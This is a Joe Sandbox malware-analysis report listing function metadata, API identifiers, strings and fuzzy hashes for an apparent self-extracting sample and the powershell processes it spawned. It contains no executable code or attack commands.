                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                          • String ID: <None>$@$FINISHMSG
                                                                                          • API String ID: 3507850446-4126004490
                                                                                          • Opcode ID: 1d4e6bd0a63b8b8b494048026c3f832f350be4f10dc00f629820bf4d9c538aed
                                                                                          • Instruction ID: 24b8ae0f766d90a177c9f4b9781ae529d9d061bdee502a2b33c250cdb4652e9e
                                                                                          • Opcode Fuzzy Hash: 1d4e6bd0a63b8b8b494048026c3f832f350be4f10dc00f629820bf4d9c538aed
                                                                                          • Instruction Fuzzy Hash: 42115EB2A08792C7F7609B24E4517BA76B0FF8D795F64A138DA4E82A85DF3DD004CB04
                                                                                          Function 00007FF681C27C50 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 48libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad$AttributesFile
                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                                                                                          • API String ID: 438848745-476397916
                                                                                          • Opcode ID: 49ff66dd0027909a7b800612d590b018d10ed512dde88fa856883505687205f1
                                                                                          • Instruction ID: d63289d0d112d2cadd646702d9cc68ba9caedd2344f867aa1e00d988144f2d48
                                                                                          • Opcode Fuzzy Hash: 49ff66dd0027909a7b800612d590b018d10ed512dde88fa856883505687205f1
                                                                                          • Instruction Fuzzy Hash: 04114F71A18686C7EF619B24E4402F977B1FFAD704FA4223AC94D82691DF3CD509C700
                                                                                          Function 00007FF681C2146E Relevance: 7.6, APIs: 5, Instructions: 51windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                          • String ID:
                                                                                          • API String ID: 1273765764-0
                                                                                          • Opcode ID: 779d4c80867048ee85b76de8b865dc8d6e9560f81da083dc2e25c0ec5bc041cf
                                                                                          • Instruction ID: 9006faccb775e197f5bcf39979c40671d306942d05ce0aed189bd149e1b6d494
                                                                                          • Opcode Fuzzy Hash: 779d4c80867048ee85b76de8b865dc8d6e9560f81da083dc2e25c0ec5bc041cf
                                                                                          • Instruction Fuzzy Hash: 78115E62A08A85C7E7605B61F4443B9A6B0FF8DB55F646335CA5E863C5CF3CD045CB00
                                                                                          Function 00007FF681C23D34 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 220windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message$BeepVersion
                                                                                          • String ID: gam
                                                                                          • API String ID: 2519184315-4248585140
                                                                                          • Opcode ID: cd403af55b8476f266db926376131480319a2a35561f0b0250f12cd9deded584
                                                                                          • Instruction ID: ea8ea6ae13e63e11d0569f45c1048d32d1a55dd8f7a647b3a08aa5b0cc5c1373
                                                                                          • Opcode Fuzzy Hash: cd403af55b8476f266db926376131480319a2a35561f0b0250f12cd9deded584
                                                                                          • Instruction Fuzzy Hash: 03916862A18652C7FB609B25E44467A66B0BF4C754F34313DDA5ED36D0CE7DE886CB00
                                                                                          Function 00007FF681C27B0F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$CloseCreateHandleWrite
                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                          • API String ID: 1065093856-4151094324
                                                                                          • Opcode ID: e045f108fcc8068e113ee9e0e4cf638292a1811dea5a3a985454c52ef67f7177
                                                                                          • Instruction ID: 2455e75c4ba31f8211ca71181e3632b8989413f0faa79e92b040bdbbaff70321
                                                                                          • Opcode Fuzzy Hash: e045f108fcc8068e113ee9e0e4cf638292a1811dea5a3a985454c52ef67f7177
                                                                                          • Instruction Fuzzy Hash: F6315B72618681C7EB618F14E4847BAB7A0FB9DB94F645239DA5D87794CFBCD408CB00
                                                                                          Function 00007FF681C25E44 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: *MEMCAB
                                                                                          • API String ID: 0-3211172518
                                                                                          • Opcode ID: 8f0ecc18e58d69be0ff920eef984cb1b5456fa5790288b24a30beba8d1cf7dc7
                                                                                          • Instruction ID: 3c5ec9f0890d4f1fbb878fb1ecaff6a35bd97ddbcf24493fb27b3ea6f57af420
                                                                                          • Opcode Fuzzy Hash: 8f0ecc18e58d69be0ff920eef984cb1b5456fa5790288b24a30beba8d1cf7dc7
                                                                                          • Instruction Fuzzy Hash: 0831E832A19B42C6EB508B11E4453BA73B0BF5D750FA1623ADA6EC27A0EF7CE444C744
                                                                                          Function 00007FF681C22308 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00007FF681C2232B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseInfoOpenQuery
                                                                                          • String ID: System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                          • API String ID: 2142960691-1430103811
                                                                                          • Opcode ID: ffb65070036c0e638a3fb9cad9fcb0c30fa5a0b7ad628ef0fdab3ccaafb5356a
                                                                                          • Instruction ID: 49d71fea027a25350e76d82467a9f1a8c387be56485158c6592c666c2d8feed9
                                                                                          • Opcode Fuzzy Hash: ffb65070036c0e638a3fb9cad9fcb0c30fa5a0b7ad628ef0fdab3ccaafb5356a
                                                                                          • Instruction Fuzzy Hash: 6B11A772618B81C7E7508F65F44456AFBA4FB89750B645229EB8982B28DF3CD055CF04
                                                                                          Function 00007FF681C286F0 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                          • String ID:
                                                                                          • API String ID: 140117192-0
                                                                                          • Opcode ID: 31029eafa361a8816cb3b7c2e50cea46018a43ad4d194b63bd7ab82f81b508e1
                                                                                          • Instruction ID: 5d7f66fdd0563cb2716e9baef3fbc3f1e99924ad8a5e0446ad038a855c017396
                                                                                          • Opcode Fuzzy Hash: 31029eafa361a8816cb3b7c2e50cea46018a43ad4d194b63bd7ab82f81b508e1
                                                                                          • Instruction Fuzzy Hash: 0641B275A08B02C2EB508B19F890365B3B4FF89B84FA0653ADA8D82764DF7CE558C744
                                                                                          Function 00007FF681C2845E Relevance: 6.1, APIs: 4, Instructions: 71sleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_cexit_inittermexit
                                                                                          • String ID:
                                                                                          • API String ID: 642454821-0
                                                                                          • Opcode ID: 09076979b3e96fc5e14e933eaad3d45af6720b0af7fabc4f9cac535cb861094d
                                                                                          • Instruction ID: 4246691c399a7acf4cbfa63f4d68cd87b65019fb2a4a8080c7c0d81a4542c0e9
                                                                                          • Opcode Fuzzy Hash: 09076979b3e96fc5e14e933eaad3d45af6720b0af7fabc4f9cac535cb861094d
                                                                                          • Instruction Fuzzy Hash: E5312732A08646C7FB609B22E89037A23F0FF4D394F68653DDA4DC36A5DE2DE854D644
                                                                                          Function 00007FF681C2874B Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                          • String ID:
                                                                                          • API String ID: 140117192-0
                                                                                          • Opcode ID: 4090816444ccd06f36d04890147d9874dc88da504e5caf5353b8954b97740e78
                                                                                          • Instruction ID: b0a76340dd4440f7693c823e2d595351f39a7847da3e4412a685fc087828bd36
                                                                                          • Opcode Fuzzy Hash: 4090816444ccd06f36d04890147d9874dc88da504e5caf5353b8954b97740e78
                                                                                          • Instruction Fuzzy Hash: 2531E379A08B41C2EB508B18F880365B3B4FF89784F60613ADA8D82764DF3CE558C744
                                                                                          Function 00007FF681C27D28 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                          • String ID:
                                                                                          • API String ID: 1214682469-0
                                                                                          • Opcode ID: 59effaab94a793ca2fbdf558991555ed1e090edb450195feb7077b6de0fa885d
                                                                                          • Instruction ID: ea46043a9b2a7480d83365686f6181eb4765688288b21faddb7c13fb1e3250e0
                                                                                          • Opcode Fuzzy Hash: 59effaab94a793ca2fbdf558991555ed1e090edb450195feb7077b6de0fa885d
                                                                                          • Instruction Fuzzy Hash: D311F972A08B41C7EB508B11E44427AAAA1FF9DFA1F686638DE5D47B94DF3CD440CA04
                                                                                          Function 00007FF681C27EA0 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: Char$Prev$Next
                                                                                          • String ID:
                                                                                          • API String ID: 3260447230-0
                                                                                          • Opcode ID: 7302f258e324082df56eb9e906256855f42b6e92faf740384e3aaa5bd17368a5
                                                                                          • Instruction ID: 112843f22ab906b029561664ae97c7b4a4e68734614ebf44c954fa0c127f3b47
                                                                                          • Opcode Fuzzy Hash: 7302f258e324082df56eb9e906256855f42b6e92faf740384e3aaa5bd17368a5
                                                                                          • Instruction Fuzzy Hash: C7119162A087D1C7EB510B25E54027DAAA2BF5EFE0F58A234DA2E83785CF2C9840C700
                                                                                          Function 00007FF681C288C8 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                          • String ID:
                                                                                          • API String ID: 140117192-0
                                                                                          • Opcode ID: 2ccba7e9cb8161b6830b4bdced448ba4434f463bc3dcbbf20418d4b2244445be
                                                                                          • Instruction ID: f19b5082ddd6803cf29f2de8006384fd16d89bf71f46ed16e8fb22b4b2238651
                                                                                          • Opcode Fuzzy Hash: 2ccba7e9cb8161b6830b4bdced448ba4434f463bc3dcbbf20418d4b2244445be
                                                                                          • Instruction Fuzzy Hash: 1D21BF35A18B46C6EB408B55E8803A973B4FF89B44FA0253ADA8D83764DF7DE158CB44
                                                                                          Function 00007FF681C23C80 Relevance: 6.0, APIs: 4, Instructions: 43windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                          • String ID:
                                                                                          • API String ID: 2776232527-0
                                                                                          • Opcode ID: 0e89c7557f5549cdd1f7fcb2b8838b8889091e68e9dc0b1ab03ce0efe7400e88
                                                                                          • Instruction ID: 942015dc3dfe287d27bceee74fcd7a341a0d659b1f8741eb10b1c76dbc70745d
                                                                                          • Opcode Fuzzy Hash: 0e89c7557f5549cdd1f7fcb2b8838b8889091e68e9dc0b1ab03ce0efe7400e88
                                                                                          • Instruction Fuzzy Hash: D5113772A18652C7F7A08F21E454B76AAB0FF9D745F54B239DA4A83994DF3CD148CB00

                                                                                          Executed Functions

                                                                                          Function 00007FFB4ADC37B5 Relevance: .0, Instructions: 49COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1569204487.00007FFB4ADC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ffb4adc0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                          • Instruction ID: 8c9257fe5d68731663ae1ec61466327c0d2dac65b01a250ec753e5be44626dd5
                                                                                          • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                          • Instruction Fuzzy Hash: 3D01A77010CB0C8FDB44EF0CE051AA6B3E0FB85320F10056DE58AC3691D632E882CB41

                                                                                          Executed Functions

                                                                                          Function 00007FFB4AEC1191 Relevance: .4, Instructions: 439COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1547899505.00007FFB4AEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_7ffb4aec0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4650fe942c8e4bf27d89baacc29f6bfb6343f7df74eb1b84c4c8b6b7f48de56a
                                                                                          • Instruction ID: 91349a84c8d2154f3a2f307d92abd5666a14cf2edabfe9231686a8f4be04721c
                                                                                          • Opcode Fuzzy Hash: 4650fe942c8e4bf27d89baacc29f6bfb6343f7df74eb1b84c4c8b6b7f48de56a
                                                                                          • Instruction Fuzzy Hash: 92D144A290EB8A4FE7A5FE78C8152B87BE5FF46210B2801FED55DC71D3DE19A8058341
                                                                                          Function 00007FFB4AEC1546 Relevance: .3, Instructions: 252COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1547899505.00007FFB4AEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_7ffb4aec0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 66a7b629970fae8ea6dc5c9f6dcc32ff6d3662644423371c909bdef8dc8bc77f
                                                                                          • Instruction ID: 5484d79977fb5f6ac31892cb896af29e00ebd2d8888b5630724336b1f01fd621
                                                                                          • Opcode Fuzzy Hash: 66a7b629970fae8ea6dc5c9f6dcc32ff6d3662644423371c909bdef8dc8bc77f
                                                                                          • Instruction Fuzzy Hash: 297116A294EBC94FE356BE7888641B57FE5EF97224B2801FFD099C7193D9094C0AC352
                                                                                          Function 00007FFB4AEC12F0 Relevance: .2, Instructions: 155COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1547899505.00007FFB4AEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_7ffb4aec0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 81ac3885f26f869a9461c2105a15699c5a90c034ce28d575c4f091dee06e3028
                                                                                          • Instruction ID: f820895cc0a3527601475b44ea4a145fcb3da93b5b03a45051494a3e5c6156b0
                                                                                          • Opcode Fuzzy Hash: 81ac3885f26f869a9461c2105a15699c5a90c034ce28d575c4f091dee06e3028
                                                                                          • Instruction Fuzzy Hash: 9D41F0D2D4FBC60FE3A6BE7C89612B86AD5BF42215B7900FAD65CC71D3DD0AA8058301
                                                                                          Function 00007FFB4ADF4325 Relevance: .0, Instructions: 49COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1547256827.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_7ffb4adf0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 64998e6327d7109a0430388bedef7d144e8725d57d90dafb0120ff9002e4a4a8
                                                                                          • Instruction ID: 621a85d64378771c845adf7008f338b636f923c62d0a4dd0dc2f465e019c6755
                                                                                          • Opcode Fuzzy Hash: 64998e6327d7109a0430388bedef7d144e8725d57d90dafb0120ff9002e4a4a8
                                                                                          • Instruction Fuzzy Hash: 5101A77111CB0C8FD744EF0CE051AB6B3E0FB85324F10056DE58AC3661D632E882CB41